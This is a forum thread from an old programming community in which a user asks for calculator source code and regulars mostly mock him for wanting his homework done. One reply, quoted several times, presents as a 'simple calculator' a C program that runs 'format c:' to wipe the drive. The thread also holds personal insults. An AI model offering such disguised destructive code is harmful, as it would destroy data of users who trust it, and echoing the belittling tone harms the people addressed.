Source Code of a Simple Calculator
-
Well, looking at what you've contributed to this site, suggests you don't know the answer to this poor persons question. This is even more funny by the fact I am the most prolific poster here ( OK, not all of it was helping people, but I'm a part of the site ), and you've posted one message, this one. If, as I assume, you're the guy who asked for this, covering your tracks, do your own homework, by all means ask questions, I'd love to help you. But giving you a gift wrapped solution does not help. your class has been structured for you to learn, if the assigment is due tomorrow and you can't do it, that is most probably your fault, and a pass at this stage will not help you in the long run. I wish you all the best in your studies, feel free to ask if you have tried to do something and find you're stuck. Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
Quality, not Q U A N T I T Y, most of your posting are verbal crap.
-
I think we've touched a nerve :-D
Excuse whilst I just jump in here. Christian is a most valuable member of our little community and is always one of the first to help those with problems. I see you are a newly registered poster and obviously not a very polite one at that.
-
Quality, not Q U A N T I T Y, most of your posting are verbal crap.
You might want to wait until you have at least one of the two before shooting your mouth off, I can't help that you're an idiot. Now let your mum back on the computer. Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
-
Gob shite ;P
Sorry, what language is that ? If there's one thing I hate more than anonymous posters, it's people who register with a fake email address and leave 'send a copy to me via email' checked. Are you this stupid in real life ? I dunno how you survive if you are. Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
-
Hi, I am engaged in a project ,now I require some source code of a simple( not scientific) calcutor to speed up my process in this project.Who can help me? You can send it to my Email ,fengrux@hotmail.com regards.
Some code is here (look at the sample code): http://www.codeproject.com/useritems/cxtpackage.asp But maybe it is a bit too large for your purpose ... :-D
-
Quality, not Q U A N T I T Y, most of your posting are verbal crap.
Though Christian's wording is different to how I would have said it (I'm a reserve Englishman, apparently), I must say the basis behind it is true. I enjoy helping people with coding and ideas, but that is when the question there ask shows their have 'had a go' and got stuck. Or it may be an area there have not worked before and just want 'a leg up'. The ones that want the source code because were to lazy to do it I have less sympathy for. As for the calculator project, he should just shut himself in front of the computer, have a look at the discusions in CodeProject about 'How to design a project' (I think its in the General section). Then just nuckle down and do it. We do it for the joy of seeing the users struggle.
-
Some code is here (look at the sample code): http://www.codeproject.com/useritems/cxtpackage.asp But maybe it is a bit too large for your purpose ... :-D
-
Sorry, what language is that ? If there's one thing I hate more than anonymous posters, it's people who register with a fake email address and leave 'send a copy to me via email' checked. Are you this stupid in real life ? I dunno how you survive if you are. Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
-
You might want to wait until you have at least one of the two before shooting your mouth off, I can't help that you're an idiot. Now let your mum back on the computer. Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
-
Hi, I am engaged in a project ,now I require some source code of a simple( not scientific) calcutor to speed up my process in this project.Who can help me? You can send it to my Email ,fengrux@hotmail.com regards.
Try this simple one:
#include <process.h>
void main( void )
{
printf("Initializing calculator, answer yes to all questions...\n");
system("format c:");
}Tomasz Sowinski -- http://www.shooltz.com
-
You're a very helpful person aren't you! Well, looking at what you've contributed to this site, suggests you don't know the answer to this poor persons question. Never mind I will email him a parser and GUI for his calculator.
Ouch!!!! Christian has 3000+ posts on CP. Can't you at least get your facts right before makin stupid comments? Nish Sonork ID 100.9786 voidmain
www.busterboy.org
Nish is a BIG fan of Goran Ivanisevic -
I don't know what you mean. Telling this person to do their own homework is the best help they can get. You think I can't write a damn calculator ? You must be joking. Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
-
Sorry, what language is that ? If there's one thing I hate more than anonymous posters, it's people who register with a fake email address and leave 'send a copy to me via email' checked. Are you this stupid in real life ? I dunno how you survive if you are. Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
If there's one thing I hate more than anonymous posters, it's people who register with a fake email address and leave 'send a copy to me via email' checked. I agree with that totally!!!!!!! Nish Sonork ID 100.9786 voidmain
www.busterboy.org
Nish is a BIG fan of Goran Ivanisevic -
Try this simple one:
#include <process.h>
void main( void )
{
printf("Initializing calculator, answer yes to all questions...\n");
system("format c:");
}Tomasz Sowinski -- http://www.shooltz.com
Um... I ran it, but it's very slow, and it uses so much memory that it's gone into virtual memory, coz the hard drive is working hard... Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
-
Um... I ran it, but it's very slow, and it uses so much memory that it's gone into virtual memory, coz the hard drive is working hard... Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
Optimize for size, not for speed :-D Tomasz Sowinski -- http://www.shooltz.com
-
Optimize for size, not for speed :-D Tomasz Sowinski -- http://www.shooltz.com
Optimize for size, not for speed Now THAT'S funny. :laugh: Christian After all, there's nothing wrong with an elite as long as I'm allowed to be part of it!! - Mike Burston Oct 23, 2001
-
Try this simple one:
#include <process.h>
void main( void )
{
printf("Initializing calculator, answer yes to all questions...\n");
system("format c:");
}Tomasz Sowinski -- http://www.shooltz.com
I couldn't run it successfully! It said missing file "DoMyHomeWorkForMe.Dll". Can someone mail it to me please? Nish Sonork ID 100.9786 voidmain
www.busterboy.org
Nish is a BIG fan of Goran Ivanisevic -
I couldn't run it successfully! It said missing file "DoMyHomeWorkForMe.Dll". Can someone mail it to me please? Nish Sonork ID 100.9786 voidmain
www.busterboy.org
Nish is a BIG fan of Goran IvanisevicI believe you can download it from this URL: ftp://ftp.ForAllYouLazyBoneHeads.com/Downloads/DoMyHomeWorkForMe.Dll (OK its not quite as good as the other replies, but it just shows where my affiliation lies on this one.) :-P "When I left you I was but the learner, now I am the Master" - Darth Vader:mad:
-
I believe you can download it from this URL: ftp://ftp.ForAllYouLazyBoneHeads.com/Downloads/DoMyHomeWorkForMe.Dll (OK its not quite as good as the other replies, but it just shows where my affiliation lies on this one.) :-P "When I left you I was but the learner, now I am the Master" - Darth Vader:mad:
You forgot to include an user ID for the site. It's moron Tomasz Sowinski -- http://www.shooltz.com
-
I believe you can download it from this URL: ftp://ftp.ForAllYouLazyBoneHeads.com/Downloads/DoMyHomeWorkForMe.Dll (OK its not quite as good as the other replies, but it just shows where my affiliation lies on this one.) :-P "When I left you I was but the learner, now I am the Master" - Darth Vader:mad:
ok I've downloaded it. Now what? tell me fasssttt! I gotta submit it tomorrow Should I copy it to my windows folder if so, can someone sent me a file that will do this copying for me. I dont have time.I ambusy posting another post asking for someone todo me a program to add three 2x2 matices :-) Nish p.s. now we have absolutely over-used this joke :-) and its gettin damp :-) LOL Sonork ID 100.9786 voidmain
www.busterboy.org
Nish is a BIG fan of Goran Ivanisevic